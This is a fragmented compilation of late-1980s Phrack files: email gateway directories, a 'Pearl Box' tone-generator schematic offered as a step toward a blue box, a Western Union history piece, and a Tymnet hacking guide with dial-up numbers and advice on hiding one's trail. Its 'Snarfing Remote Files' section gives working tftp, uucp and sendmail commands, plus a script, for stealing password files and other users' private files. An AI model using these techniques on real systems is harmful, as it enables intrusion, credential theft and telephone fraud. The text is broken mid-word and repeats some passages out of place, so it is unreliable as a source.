as of 3/3/89 cost $4.75 per month or $5.75 per mon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hosts that are outside of the U.S.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re also charged for each message that you send.  If you are correspon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someone who is not a DASnet subscriber, THEIR MAIL TO YOU is bill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accou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is an abbreviated cost list for mailing to the different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DAS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TIAL List                DASnet Cost    DASnet C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Services                  1st 1000    Each Add'l 1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ked by DASnet (e-mail)   Characters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ET, MacNET, PeaceNet,                             NOTE:  20 l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nison, UUCP*, Domains,        .21            .11   of text is ap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g. .COM, .EDU*                                    1000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lcom--Any "host" in U.S.    .36            .2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lcom--Hosts outside U.S.    .93            .8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asyLink (From EasyLink)       .21            .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EasyLink)         .55            .2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 FAX (internat'l avail.)   .79            .3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oMail--Any "host" in U.S.    .21            .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oMail--Hosts outside U.S.    .74            .6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CI  (from MCI)                .21            .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MCI)                  .78            .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per mail - USA)       2.31            .2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lemail                       .36            .2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U. Telex--United States     1.79           1.6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can also send Telexes outside the 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WICS--Japan                   .89            .4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charges given here are to the gateway to the network.  The DAS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r is not charged for transmission on the network itsel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cribers to DASnet get a free DASnet Network Directory as well as a li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directory, and the ability to order optional DASnet services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porting or DASnet Telex Service which gives you your own Telex numb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swerback for $8.40 a month at this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Snet is a registered trademark of DA Systems,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 Systems, I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503 E. Campbell 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mpbell, CA  9500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08-559-74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LEX:  910 380-353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two sections on PeaceNet and AppleLink are in association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Snet as this network is what is used to connect00             Fin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sinki Telephone Co.     ELISA                   Fin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Dialcom                 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net                    Telemail                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DD                        Messavia                Jap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ac                   ATLAS400                Fr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terconnections are based on the X.400 standard, a set of guideline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rmat, delivery and receipt of electronic messages recommended by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standards committee the CCITT.  International X.400 messa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ur a surcharge.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Cana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 note:            $.0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 message unit:    $.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other international lo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 note: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 message unit:    $.5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no surcharge for X.400 messages within the U.S.  The following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acts to speak with about mailing through these mentioned networks.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stions can be directed through AT&amp;T Mail's toll-free number, 1-800-624-567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atlas                     MHS Gateway:  mhs!da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Bernard Tardieu             Administrator:  Bob Nichol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ac                                    AT&a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3399283203                          Morristown, NJ  079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1 201 644 183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dialcom                   MHS Gateway:  mhs!eli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Mr. Laraman                 Administrator:  Ulla Karajalain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Nokia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th Plainfield, NJ  07080                 Phone:  0113580437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1 441 493 384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envoy                     MHS Gateway:  mhs!kd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Kin C. Ma                   Administrator:  Shigeo Lw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m Canada                              Kokusai Denshin Denwa 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1 613 567 7584                     Phone:  813347741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mailnet                   MHS Gateway:  mhs!o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Kari Aakala                 Administrator:  Gary W. Krumb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 Directorate Of Post &amp;                   AT&amp;T Information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35806921730                         Lincroft, NJ  077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ne:  +1 201 576 265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telemail                  MHS Gateway:  m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Jim Kelsay                  Administrator:  AT&amp;T Mail M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E Telenet Comm Corp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ton, VA  22096                           AT&a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1 703 689 6034                     Lincroft, NJ  088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ne:  +1 800 624 567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M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ly known as Intermail, the Commercial Mail Relay (CMR) Service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relay service between the Internet and three commercial electronic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US Sprint/Telenet, MCI-Mail, and DIALCOM systems (i.e. Comp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SFMAIL, and USDA-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important note:  The only requirement for using this mail gateway i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ork conducted must be DARPA sponsored research and other appro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vernment business.  Basically, this means that unless you've got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vernment-related business, you're not supposed to be using this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ardless, it would be very difficult for them to screen everything that g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ir gateway.  Before I understood the requirements of this gateway,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sending to a user of MCI-Mail and was not contacted about any problems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communication.  Unfortunately, I mistyped the MCI-Mail address on on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etters and that letter ended up getting read by system administrators wh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informed me that I was not to be using that system, as well as the fa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y would like to bill me for using it.  That was an interesting thou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ir part anyway, but do note that using this service does incur char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MR mailbox address in each system corresponds to the lab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lemail:  [Intermail/USCISI]TELEMAIL/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CI-Mail:  Intermail      or      107-823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pMail:  Intermail      or      CMP081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SF-Mail:  Intermail      or      NSF15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DA-Mail:  Intermail      or      AGS999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ing examples for each e-mail system ar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CI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3-4567             seven digit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erett T. Bowens    person's name (must be uniq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MP0123              three letters followed by three or four dig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Cooper             initial, then "." and then last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34:CMP0123          domain, then ":" and then combination syste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ount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SF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SF0123              three letters followed by three or four dig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Phillips           initial, then "." and then last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57:NSF0123          domain, then ":" and then combination syste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ount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DA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GS0123              three letters followed by three or four dig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Shifter            initial, then "." and then last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57:AGS0123          domain, then ":" and then combination syste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ount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NOC               user (directly on Tele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NOC/LODH          user/organization (directly on Tele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NOC/LODH]TELEMAIL/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r/organization]system branch/coun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are other Telenet system branches/countries that can be ma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MAIL/USA     NASAMAIL/USA     MAIL/USA            TELEMEMO/AUSTRAL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M/CANADA   TOMMAIL/CHILE    TMAILUK/GB          ITALMAIL/ITA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I/JAPAN        PIPMAIL/ROC      DGC/USA             FAAMAIL/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SFC/USA         GTEMAIL/USA      TM11/USA            TNET.TELEMAIL/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DA/US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MNET's ScienceNet is on the Telenet system MAIL/USA and to mail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the format would be [A.MAILBOX/OMNET]MAIL/USA.  The following are avail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divisions of OM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IR     Atmospheric Sci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ARTH   Solid Earth Sci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FE    Life Sci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CEAN   Ocean Sci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LAR   Interdisciplinary Polar Stud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PACE   Space Science and Remote Sen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is a list of DIALCOM systems available in the listed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ir domain and system numb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Name            Country             Domain Number    System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link-Dialcom         Australia           60               07, 08, 0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Canada              20               20, 21, 22, 23, 2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PT Databoks            Denmark             124              7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box                 Finland             127              6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box                 West Germany        30               15, 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Hong Kong           80               88, 8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rmail                 Ireland             100              7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ldnet                 Israel              50               05, 0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mail              Italy               130              65, 6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mail              Italy               1                66, 6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Japan               70               13,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Korea               1                5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m Gold            Malta               100              7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Mexico              1                5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mocom                 Netherlands         124              27, 28, 2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mocom                 Netherlands         1                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net                 New Zealand         64               01, 0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Puerto Rico         58               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box                 Singapore           88               10, 11,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Taiwan              1                5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com Gold            United Kingdom      100              01, 04, 1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8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COM                 USA                 1                29, 30, 31, 3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3, 34, 37, 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1-59, 61, 62, 6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0-9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You can also mail to username@NASAMAIL.NASA.GOV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rname@GSFCMAIL.NASA.GOV instead of going through the CMR gatewa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il to NASAMAIL or GSFC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more information and instructions on how to use CMR, send a message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 support group at intermail-request@intermail.isi.edu (you'll get basic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ve listed plus maybe a bit more).  Please read Chapter 3 of The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cendent Saga (Limbo to Infinity) for specifics on mailing to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ination mailing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SER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Serve is well known for its games and conferences.  It does, though,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ing capability.  Now, they have developed their own Internet domain, ca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SERVE.COM.  It is relatively new and mail can be routed through ei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T.CIS.OHIO-STATE.EDU or NORTHWESTERN.AR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 user%COMPUSERVE.COM@TUT.CIS.OHIO-STATE.EDU or re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UT.CIS.OHIO-STATE.EDU with NORTHWESTERN.AR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mpuServe link appears to be a polled UUCP connection at the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It is actually managed via a set of shell scripts and a comm ut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ed xcomm, which operates via command scripts built on the fly by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ipts during analysis of what jobs exist to go into and out of CompuSer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Serve subscriber accounts of the form 7xxxx,yyyy can be addressed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xxxx.yyyy@compuserve.com.  CompuServe employees can be addressed by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names in the csi.compuserve.com subdomain.  CIS subscribers write mail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inet:user@host.domain" to mail to users on the Wide-Area Networks, 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ateway:" is CompuServe's internal gateway access syntax.  The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erates fully-RFC-compliant head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ully extrapolate -- from the CompuServe side, you would use their EasyPl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system to send mail to someone in BITNET or the Internet.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nd me mail at my Bitnet id, you would address it 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ET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.ED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to my Internet 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ET:C488869@UMCVMB.MISSOURI.ED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f you have a BITNET to Internet userid, this is a silly thing to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your connect time to CompuServe costs you money.  However, you can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nformation to let people on CompuServe contact YOU.  CompuServe Custo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says that there is no charge to either receive or send a message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et or BIT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S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Snet is a smaller network that connects to the Wide-Area Networks but char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ir service.  DASnet subscribers get charged for both mail to user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networks AND mail for them from users of other networks.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a brief description of DASnet, some of which was taken from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motional text let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Snet allows you to exchange electronic mail with people on more than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and networks that are interconnected with DASnet.  On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wbacks, though, is that, after being subscribed to these services, you m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subscribe to DASnet, which is a separate cost.  Members of Wide-Are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s can subscribe to DASnet too.  Some of the networks and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chable through DASnet include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A/net, ATT Mail, BIX (Byte Information eXchange), DASnet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lcom, EIES, EasyLink, Envoy 100, FAX, GeoMail, INET, MCI Mail, NW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aceNet/EcoNet, Portal Communications, The Meta Network, The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lemail, ATI's Telemail (Japan), Telex, TWICS (Japan), UNISON, UUCP,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LL, and Domains (i.e. ".COM" and ".EDU" etc.).  New systems are ad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l of the time.  As of the writing of this file, Connect, Gover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cNET, and The American Institute of Physics PI-MAIL are soon t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ec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get various accounts on DASnet inclu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Corporate Accounts -- If your organization wants more than one individu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bscrip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Site Subscriptions -- If you want DASnet to link directly to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O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PHRACK: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er Filenam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PHRACK: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er Filenam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PHRACK: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er Filenam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PHRACK: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er Filenam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PHRACK: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er Filenam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PHRACK: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er Filenam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PHRACK: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er Filenam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PHRACK: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er Filenam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PHRACK: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er Filenam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ack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olume Three, Issue 28, File #5 of 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 Real Functioning PEARL BOX Schema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ritten, Tested, and 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y Disp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July 1, 198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  After reading the earlier renditions of schematics for the Pear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x, I decided that there was an easier and cheaper way of do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same thing with an IC and parts you probably have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ing around the ho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s A Pearl Box and Why Do I Want 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Pearl Box is a tone generating device that is used to make a wide r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single tones.  Therefore, it would be very easy to modify this bas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sign to make a Blue Box by making 2 Pearl Boxes and joining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gether in some fash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Pearl Box can be used to create any tone you wish that other boxes m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  It also has a tone sweep option that can be used for numerous th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ke detecting different types of phone tapping de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s Li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D4049 RCA integrated circu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uF disk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uF 16V electrolitic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K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M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meg p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N914 di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me SPST momentary push-button switc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SPDT toggle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 Volt battery &amp; cl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miscellaneous stuff you should have laying around the ho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te-of-the-Art-Text Schemat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6V  1u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_____________________            |__________| |/| 8oh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_:__|_       |            __________|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9 10 11 12 13 14 15 16 |      |           |          |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CD4049UB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1__2__3__4__5__6__7__8_|      :           |          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__|  |__|  |  |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________________________|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1N914  !           !                     [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0M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           |  &lt;-- These 2 wires to the center p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of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uF   50V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_________|           |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_[Toggle Switch]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o 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___| |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K         ^   |                              |____|     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                              |          o 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_| |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akala                 Administrator:  Gary W. Krumb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 Directorate Of Post &amp;                   AT&amp;T Information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35806921730                         Lincroft, NJ  077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ne:  +1 201 576 265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HS Gateway:  mhs!telemail                  MHS Gateway:  m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or:  Jim Kelsay                  Administrator:  AT&amp;T Mail M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E Telenet Comm Corp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ton, VA  22096                           AT&am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1 703 689 6034                     Lincroft, NJ  088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ne:  +1 800 624 567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M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ly known as Intermail, the Commercial Mail Relay (CMR) Service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relay service between the Internet and three commercial electronic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US Sprint/Telenet, MCI-Mail, and DIALCOM systems (i.e. Comp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SFMAIL, and USDA-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important note:  The only requirement for using this mail gateway i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ork conduc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ack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olume Three, Issue 28, File #6 of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Snarfing Remote Fi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ark OverL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many ways of getting copies of files from a remote system that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not have permission to read or an account on login on to and access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Many administrators do not even bother to restrict many a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nts that you can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the simplest wa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Use uucp(1) [Trivial File Transfer Protocol] to retrieve a cop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a file if you are running on an Internet based ne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Abuse uucp(1) [Unix to Unix Copy Program] to retrieve a copy of a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uucp connections are running on that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 Access one of many known security loopho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following examples, we will use the passwd file as the file to acqu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it is a readable file that can be found on most systems that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acks are valid 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First start the tftp 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ter the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ft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have the following promp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f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The next step is to connect to the system that you wish to retrieve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At the tftp,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ftp&gt; connect other.system.c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Now request the file you wish to get a copy of (in our ca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sswd file /etc/passw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ftp&gt; get /etc/passwd /tmp/passw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should see something that looks like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ived 185659 bytes in 22 seco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Now exit the tftp program with the "quit"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ftp&gt; q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uld now have a copy of other.system.com's passwd file in your direct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Some Unix systems' tftp programs have a different syntax.  The above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sted under SunOS 4.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xample, on Apollos, the syntax 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ftp -{g|g!|p|r|w} &lt;local file&gt; &lt;host&gt; &lt;foreign file&gt; [netascii|im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us you must use the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ftp -g password_file networked-host /etc/passw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ult your local "man" pages for more info (or in other words RTF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end of this article, I will include a shell script that will snar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word file from a remote host.  To use it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pw system_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uming we are getting the file  /etc/passwd  from the system uusuck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system has a direct uucp connection to that system, it is possibl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est a copy of the file through the uucp links.  The following command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est that a copy of the passwd file be copied into uucp's home direc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r/spool/uucppubl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ucp -m uusucker!/etc/passwd '&gt;uucp/uusucker_passw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lag "-m" means you will be notified by mail when the transfer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le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third possible way to access the desired file requires that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gin permission to the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case we will utilize a well-known bug in Unix's sendmail daem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ndmail program has and option "-C" in which you can specif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iguration file to use (by default this file is /usr/lib/sendmail.cf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c/sendmail.cf).  It should also be noted that the diagnostics outputted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mail contain the offending lines of text.  Also note that the send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runs setuid roo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y you can abuse this set of facts (if you have not yet guessed) is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ying the file you wish read as the configuration file.  Thus the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mail -C/usr/accounts/random_joe/private/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give you a copy of random joe's privat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similar trick is to symlink your .mailcf file to joe's file and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one.  When mail executes sendmail (to send the mail), it will load in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cf and barf out joe's stu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link joe's file to your .mailc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n -s /usr/accounts/random_joe/private/file $HOME/.mailc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 send mail to some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C488869@umcvmb.missouri.ed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ave fu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t Here=-=-=-Cut Here=-=-=- gpw.sh =-=-=-Cut Here=-=-=-=-Cu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pw copyright(c) Dark Overl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r/ucb/tftp $1 &lt;&lt; E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 asc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b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etc/passwd /tmp/pw.$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t Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-=-Cu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_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END OF MESS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O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PHRACK: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ack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olume Three, Issue 30, File #10 of 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estern Un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elex, TWX, and Time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y Phone Phana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September 17, 198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ntil a few years ago -- maybe ten -- it was very common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e TWX and Telex machines in almost every business pl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ere only minor differences between Telex and TWX.  The bigg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erence was that the former was always run by Western Union, whil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ter was run by the Bell System for a number of years.  TWX literally me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W)riter e(x)change," and it was Bell's answer to competition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stern Union.  There were "three row" and "four row" machines, mean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of keys on the keyboard and how they were laid out.  The "three r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s were simply part of the regular phone network; that is, they c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 out and talk to another TWX also connected on regular phone l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ntually these were phased out in favor of "newer and more improved" mach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dditional keys, as well as a paper tape reader attachment which allow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ing the same message repeatedly to many different machines.  These "f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w" machines were not on the regular phone network, but were assigned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n area codes (410-510-610-710-810-910) where they still remain toda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way a four row machine could call a three row machine or vice-versa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a gateway of sorts which translated some of the character set uniqu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ch mach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stern Union's network was called Telex and in addition to being abl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act (by dial up) other similar machines, Telex could connect with TWX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ce-versa) as well as all the Western Union public offices around the coun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the late 1950's or early 1960's, every small town in America ha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stern Union office.  Big cities like Chicago had perhaps a dozen of the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used messengers to hand deliver telegrams around town.  Telegrams c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ced in person at any public office, or could be called in to the near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arrangement with most telcos, the Western Union office in town nearly alw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d the phone number 4321, later supplemented in automated exchanges with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fix XXX-4321.  Telegrams could be charged to your home phone bill (thi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ll the case in some communities) and from a coin phone, one did not ask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321, but rather, called the operator and asked for Western Union.  This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cessary since once the telegram had been given verbally to the wire cle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 in turn had to flash the hook and get your operator back on the lin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m "collect five dollars and twenty cents" or whatever the cost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grams, like phone calls, could be sent collect or billed third party.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ad an account with Western Union, i.e. a Telex machine in your offic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charge the calls there, but most likely you would simply se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gram from there in the first pl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ime in the early 1960's, Western Union filed suit against AT&amp;T asking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turn over their TWX business to them.  They cited an earlier court ru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rca 1950's, which said AT&amp;T was prohibited from acquiring any more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ing companies except under certain conditions.  The Supreme Court agr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Western Union that "spoken messages" were the domain of Ma Bell,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itten messages" were the domain of Western Union.  So Bell was requir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est itself of the TWX network, and Western Union has operated it si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a few years ago they began phasing out the phrase "TWX" in favor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x II"; their original device being "Telex I" of course.  TWX still u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n digit dialing with 610 (Canada) or 710/910 (USA) being the leading th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its.  Apparently 410-510 have been abandoned; or at least they are used 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tle, and Bellcore has assigned 510 to the San Francisco area starting i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r or so.  410 still has some funny things on it, like the Western Un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master," which is a computer that functions like a gateway between Tel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X, EasyLink and some other stu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day, the Western Union network is but a skeleton of its former self.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of their messages are handled on dial up terminals connected to the publ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network.  It has been estimated the TWX/Telex business is about fif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cent of what it was a decade ago, if that mu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there was the Time Service, a neat thing which Western Union offere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seventy years, until it was discontinued in the middle 1960's.  The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provided an important function in the days before alternating curr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commonly available.  For example, Chicago didn't have AC electricity unt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1945.  Prior to that we used DC, or direct curr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o run an electric clock, you need 60 cycles AC current for obvi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sons, so prior to the conversion from DC power to AC power, electric w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cks such as you see in every office were unheard of.  How were peopl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time of day accurately?  Enter the Western Union cl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estern Union, or "telegraph clock" was a spring driven wind up clock,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 difference.  The clocks were "perpetually self-winding," manufactured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lf-Winding Clock Company of New York City.  They had large batte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ide them, known as "telephone cells" which had a life of about ten yea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ch.  A mechanical contrivance in the clock would rotate as the clock sp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wound, and once each hour would cause two metal clips to contact for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n seconds, which would pass juice to the little motor in the clock which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re-wound the main spring.  The principle was the same as the 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ed clocks we see today.  The battery does not actually run the c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 current can't do that -- but it does power the tiny motor which re-wi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pring which actually drives the cl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estern Union clocks came in various sizes and shapes, ranging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est dials which were nine inches in diameter to the largest which w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eighteen inches in diameter.  Some had sweep second hands; others d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Some had a little red light bulb on the front which would flas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ical model was about sixteen inches, and was found in offices, schoo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ortation depots, radio station offices, and of course in the telegrap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itsel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thing all the clocks had in common was their brown metal cas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eam-colored face, with the insignia "Western Union" and their corporate lo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ose days which was a bolt of electricity, sort of like a letter "Z" lay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its side.  And in somewhat smaller print below, the words "Naval Observa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cal clocks in an office or school or wherever were calibrated by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 clock" (actually a sub-master) on the premises.  Once an hour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ur, the (sub) master clock would drop a metal contact for just a half sec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end about nine volts DC up the line to all the local clocks.  They in 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d a "tolerance" of about two minutes on both sides of the hour so t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rent coming to them would yank the minute hand exactly upright o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elve from either direction if the clock was fast or s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ub-master clocks in each building were in turn serviced by the ma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ck in town; usually this was the one in the telegraph office.  Every hour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alf hour, the master clock in the telegraph office would throw curren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ub-masters, yanking them into synch as required.  And as for the telegrap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s themselves, they were serviced twice a day by -- you guessed it --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al Observatory Master clock in Our Nation's Capitol, by the same rout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one there would press half a dozen buttons at the same time, using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vailable fingers; current would flow to every telegraph office and synch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aster clocks in every community.  Western Union charged fifty cents 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th for the service, and tossed the clock in for free!  Oh yes, there was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allation charge of about two dollars when you first had service (i.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ck) install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locks were installed and maintained by the "clockman," a technician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stern Union who spent his day going around hanging new clocks, taking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service, changing batteries every few years for each clock,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a panic it was for them when "war time" (what we now call Daylight Sav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came around each year!  Wally, the guy who serviced all the clock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ntown Chicago had to start on *Thursday* before the Sunday offic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over just to finish them all by *Tuesday* following.  He would liter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sh in an office, use his screwdriver to open the case, twirl the hour h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one hour forward in the spring, (or eleven hours *forward* in the f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ce the hands could not be moved backward beyond the twelve go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terclockwise), slam the case back on, screw it in, and move down the h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next clock and repeat the process.  He could finish several dozen cloc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day, and usually the office assigned him a helper twice a year for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y never bothered to line the minute hand up just right, becaus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have taken too long, and ".....anyway, as long as we got it withi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ute or so, it would synch itself the next time the master clock sen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  Working fast, it took a minute to a minute and a half to ope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 twirl the minute hand, put the case back on, "stop and b.s.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ptionist for a couple seconds" and move alo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aster clock sent its signal over regular telco phone lines.  Usually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terminate in the main office of whatever place it was, and the (su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 there would take over at that po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ly said it was very important to do a professional job of hanging the c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egin with.  It had to be level, and the pendulum had to be just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wise the clock would gain or lose more time than could be accommodat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urly synching process.  He said it was a very rare clock that actu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out by even a minute once an hour, let alone the two minutes of toler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ilt into the gear wor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metimes I would come to work on Monday morning, and find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the office that the clock line had gone open Friday evening.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body all weekend got a signal.  Usually I would go down a manh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find it open someplace where one of the Bell guys messed it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took it off and never put it back on.  To find out where it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pen, someone in the office would 'ring out' the line; I'd go a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wntown following the loop as we had it laid out, and keep liste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 my headset for it.  When I found the break or the open, I w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ie it down again and the office would release the line; but then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d to go to all the clocks *before* that point and restart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nce the constant current from the office during the search h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ually caused them to st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he said, time and again, the clocks were usually so well mounted and hu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t was rare we would find one so far out of synch that we ha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just it manually.  Usually the first signal to make it through once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aired the circuit would yank everyone in town to make up for whatever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st or gained over the weeke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1965, Western Union decided to discontinue the Time Service.  In a nostalg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ter to subscribers, they announced their decision to suspend operations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nd of the current month, but said "for old time's sake" anyone who ha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ck was welcome to keep it and continue using it; there just would not be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ting signals from the master clocks any lon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in a day or two of the official announcement, every Western Union clock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icago area headquarters building was gone.  The executives snatched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 the wall, and took them home for the day when they would have histori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lue.  All the clocks in the telegraph offices disappeared about the s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be replaced with standard office-style electric wall cloc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_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ack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olume Three, Issue 30, File #3 of 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Hacking &amp; Tym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Synthec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literally hundreds of systems connected to some of these lar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s, like Tymnet and Telenet.  Navigation around these networks is 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e, and usually well explained in their on-line document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rthermore, some systems will actually tell you what is connected and how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to it.  In the case of Tymnet, after dialing in, at the log in prompt,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for the on-line documen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ssing systems through networks is as simple as providing an address for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onnect to.  The best way to learn about the addresses and how to do th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network is to read "A Novice's Guide to Hacking (1989 Edition)" which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Issue 22, File 4 of 12, Volume Two (December 23, 1988).  Some point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iterated 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on a network, you provide the NUA (network user address) of the system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to connect to.  NUAs are strings of 15 digits, broken up in to 3 fiel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TWORK ADDRESS, the AREA PREFIX, and the DNIC.  Each field has 5 dig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re left padded with 0's where necess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NIC determines which network to take the address from.  Tymnet,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 is 03106. 03110 is Tele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REA PREFIX and NETWORK ADDRESS determine the connection point.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ing the address of the system that you wish to connect to, you w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ssing it through the net... as if you were calling it directly.  Obvious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this provides one more level of security for ac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connecting to an outdial, you can increase again the level of security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joy, by using the outdial in that area to connect to the remote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endum -- Accessing Tymnet Over Local Packet Networ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just another way to get that extra step and/or bypass other rou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able is copied from Tymnet's on-line information.  As said earlier,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great resource, this on-line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LL ATLANT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DE    CITY                  STATE           SPEED    ACCESS NUMBER  NTW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DOVER                 DELAWARE        300/2400 302/734-9465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GEORGETOWN            DELAWARE        300/2400 302/856-7055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NEWARK                DELAWARE        300/2400 302/366-08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WILMINGTON            DELAWARE        300/1200 302/428-003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WILMINGTON            DELAWARE        2400     302/655-1144   @PD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WASHINGTON            DIST. OF COL.   300/1200 202/479-7214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WASHINGTON (MIDTOWN)  DIST. OF COL.   2400     202/785-1688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WASHINGTON (DOWNTOWN) DIST. OF COL.   300/1200 202/393-6003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WASHINGTON (MIDTOWN)  DIST. OF COL.   300/1200 202/293-4641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WASHINGTON            DIST. OF COL.   300/1200 202/546-5549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WASHINGTON            DIST. OF COL.   300/1200 202/328-0619   @PD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BETHESDA              MARYLAND        300/1200  301/986-9942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COLESVILLE            MARYLAND        300/2400  301/989-9324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HYATTSVILLE           MARYLAND        300/1200  301/779-9935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LAUREL                MARYLAND        300/2400  301/490-9971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ROCKVILLE             MARYLAND        300/1200  301/340-9903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SILVER SPRING         MARYLAND        300/1200  301/495-9911  @PD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BERNARDSVILLE         NEW JERSEY      300/2400 201/766-7138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CLINTON               NEW JERSEY      300-1200 201/730-8693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DOVER                 NEW JERSEY      300/2400 201/361-9211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EATONTOWN/RED BANK    NEW JERSEY      300/2400 201/758-80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ELIZABETH             NEW JERSEY      300/2400 201/289-51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ENGLEWOOD             NEW JERSEY      300/2400 201/871-30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FREEHOLD              NEW JERSEY      300/2400 201/780-889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HACKENSACK            NEW JERSEY      300/2400 201/343-92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JERSEY CITY           NEW JERSEY      300/2400 201/659-38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LIVINGSTON            NEW JERSEY      300/2400 201/533-0561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LONG BRANCH/RED BANK  NEW JERSEY      300/2400 201/758-80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MADISON               NEW JERSEY      300/2400 201/593-0004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METUCHEN              NEW JERSEY      300/2400 201/906-95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MIDDLETOWN            NEW JERSEY      300/2400 201/957-90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MORRISTOWN            NEW JERSEY      300/2400 201/455-0437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NEWARK                NEW JERSEY      300/2400 201/623-0083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NEW BRUNSWICK         NEW JERSEY      300/2400 201/247-27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NEW FOUNDLAND         NEW JERSEY      300/2400 201/697-938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PASSAIC               NEW JERSEY      300/2400 201/473-62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PATERSON              NEW JERSEY      300/2400 201/345-77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PHILLIPSBURG          NEW JERSEY      300/2400 201/454-927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POMPTON LAKES         NEW JERSEY      300/2400 201/835-84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RED BANK              NEW JERSEY      300/2400 201/758-80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RIDGEWOOD             NEW JERSEY      300/2400 201/445-48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SOMERVILLE            NEW JERSEY      300/2400 201/218-12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SOUTH RIVER           NEW JERSEY      300/2400 201/390-91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SPRING LAKE           NEW JERSEY      300/2400 201/974-085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TOMS RIVER            NEW JERSEY      300/2400 201/286-38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WASHINGTON            NEW JERSEY      300/2400 201/689-6894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7771   WAYNE/PATERSON        NEW JERSEY      300/2400 201/345-7700   @PD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ALLENTOWN             PENNSYLVANIA    300/1200 215/435-0266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1301   ALTOONA               PENNSYLVANIA    300/1200 814/946-8639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1301   ALTOONA               PENNSYLVANIA    2400     814/949-0505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AMBLER                PENNSYLVANIA    300/1200 215/283-217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AMBRIDGE              PENNSYLVANIA    300/1200 412/266-961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CARNEGIE              PENNSYLVANIA    300/1200 412/276-1882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CHARLEROI             PENNSYLVANIA    300/1200 412/483-91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CHESTER HEIGHTS       PENNSYLVANIA    300/1200 215/358-082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COATESVILLE           PENNSYLVANIA    300/1200 215/383-7212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CONNELLSVILLE         PENNSYLVANIA    300/1200 412/628-756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DOWNINGTON/COATES.    PENNSYLVANIA    300/1200 215/383-7212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62   DOYLESTOWN            PENNSYLVANIA    300/1200 215/340-0052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62   GERMANTOWN            PENNSYLVANIA    300/1200 215-843-4075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GLENSHAW              PENNSYLVANIA    300/1200 412/487-6868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GREENSBURG            PENNSYLVANIA    300/1200 412/836-784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1301   HARRISBURG            PENNSYLVANIA    300/1200 717/236-3274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1301   HARRISBURG            PENNSYLVANIA    2400     717/238-045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INDIANA               PENNSYLVANIA    300/1200 412/465-721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KING OF PRUSSIA       PENNSYLVANIA    300/1200 215/270-297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KIRKLYN               PENNSYLVANIA    300/1200 215/789-565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LANSDOWNE             PENNSYLVANIA    300/1200 215/626-9001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LATROBE               PENNSYLVANIA    300/1200 412/537-034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1301   LEMOYNE/HARRISBURG    PENNSYLVANIA    300/1200 717/236-3274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MCKEESPORT            PENNSYLVANIA    300/1200 412/673-62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NEW CASTLE            PENNSYLVANIA    300/1200 412/658-5982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NEW KENSINGTON        PENNSYLVANIA    300/1200 412/337-051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NORRISTOWN            PENNSYLVANIA    300/1200 215/270-297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PAOLI                 PENNSYLVANIA    300/1200 215/648-001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62   PHILADELPHIA          PENNSYLVANIA    300/1200 215/923-7792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62   PHILADELPHIA          PENNSYLVANIA    300/1200 215/557-0659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62   PHILADELPHIA          PENNSYLVANIA    300/1200 215/545-7886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62   PHILADELPHIA          PENNSYLVANIA    300/1200 215/677-0321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62   PHILADELPHIA          PENNSYLVANIA    2400     215/625-077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PITTSBURGH            PENNSYLVANIA    300/1200 412/281-895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PITTSBURGH            PENNSYLVANIA    300/1200 412-687-4131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PITTSBURGH            PENNSYLVANIA    2400     412/261-9732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POTTSTOWN             PENNSYLVANIA    300/1200 215/327-8032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QUAKERTOWN            PENNSYLVANIA    300/1200 215/538-7032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READING               PENNSYLVANIA    300/1200 215/375-757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ROCHESTER             PENNSYLVANIA    300/1200 412/728-977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SCRANTON              PENNSYLVANIA    300/1200 717/348-1123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SCRANTON              PENNSYLVANIA    2400     717/341-186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SHARON                PENNSYLVANIA    300/1200 412/342-1681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TULLYTOWN             PENNSYLVANIA    300/1200 215/547-330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UNIONTOWN             PENNSYLVANIA    300/1200 412/437-564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62   VALLEY FORGE          PENNSYLVANIA    300/1200 215/270-297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WASHINGTON            PENNSYLVANIA    300/1200 412/223-909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526   WAYNE                 PENNSYLVANIA    300/1200 215/341-9605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672   WILKINSBURG           PENNSYLVANIA    300/1200 412/241-1006   @PD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ALEXANDRIA            VIRGINIA        300/1200  703/683-6710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ARLINGTON             VIRGINIA        300/1200  703/524-8961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FAIRFAX               VIRGINIA        300/1200  703/385-1343  @PD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54   MCLEAN                VIRGINIA        300/1200  703/848-2941  @PD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DN BELL ATLANTIC - NETWORK NAME IS PUBLIC DATA NETWORK (PD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ECT MES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 _. _&lt; _C _R _&gt; _            (SYNCHRONIZES DATA SPEE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LCOME TO THE BPA/DST PD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T _  _&lt; _C _R _&gt; _           (TYMNET ADD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31069             (ADDRESS CONFIRMATION - TYMNET DN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                (CONFIRMATION OF CALL SET-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WY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DAS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LL SOU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DE    CITY                  STATE           DENSITY  ACCESS NUMBER MOD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207   ATLANTA               GEORGIA         300/1200 404/261-4633  @PLS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207   ATHENS                GEORGIA         300/1200 404/354-0614  @PLS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207   COLUMBUS              GEORGIA         300/1200 404/324-5771  @PLS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207   ROME                  GEORGIA         300/1200 404/234/7542  @PLS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LSK  BELLSOUTH - NETWORK NAME IS PULSELIN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ECT ME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 _. _  _&lt; _C _R _&gt; _           (SYNCHRONIZES DATA SP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ES NOT ECHO TO THE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EC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ULSELIN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_3 _1 _0 _6 _              (TYMNET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ES NOT ECHO TO THE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ULSELINK: CALL CONNECTED TO 1 310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WY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DAS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CIFIC B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DE    CITY                  STATE           DENSITY  ACCESS NUMBER  NTW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BERKELEY              CALIFORNIA      300/1200 415-548-2121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EL SEGUNDO            CALIFORNIA      300/1200 213-640-8548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FULLERTON             CALIFORNIA      300/1200 714-441-2777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INGLEWOOD             CALIFORNIA      300/1200 213-216-7667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LOS ANGELES(DOWNTOWN) CALIFORNIA      300/1200 213-687-3727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LOS ANGELES           CALIFORNIA      300/1200 213-480-1677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MOUNTAIN VIEW         CALIFORNIA      300/1200 415-960-3363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OAKLAND               CALIFORNIA      300/1200 415-893-9889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PALO ALTO             CALIFORNIA      300/1200 415-325-4666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PASADENA              CALIFORNIA      300/1200 818-356-0780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SAN FRANCISCO         CALIFORNIA      300/1200 415-543-8275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SAN FRANCISCO         CALIFORNIA      300/1200 415-626-5380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SAN FRANCISCO         CALIFORNIA      300/1200 415-362-2280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SAN JOSE              CALIFORNIA      300/1200 408-920-0888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SANTA ANNA            CALIFORNIA      300/1200 714-972-9844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VAN NUYS              CALIFORNIA      300/1200 818-780-1066   @P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PS   PACIFIC BELL - NETWORK NAME IS PUBLIC PACKET SWITCHING (P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ECT ME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 _. _&lt; _C _R _             (SYNCHRONIZES DATA SPEED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ES NOT ECHO TO 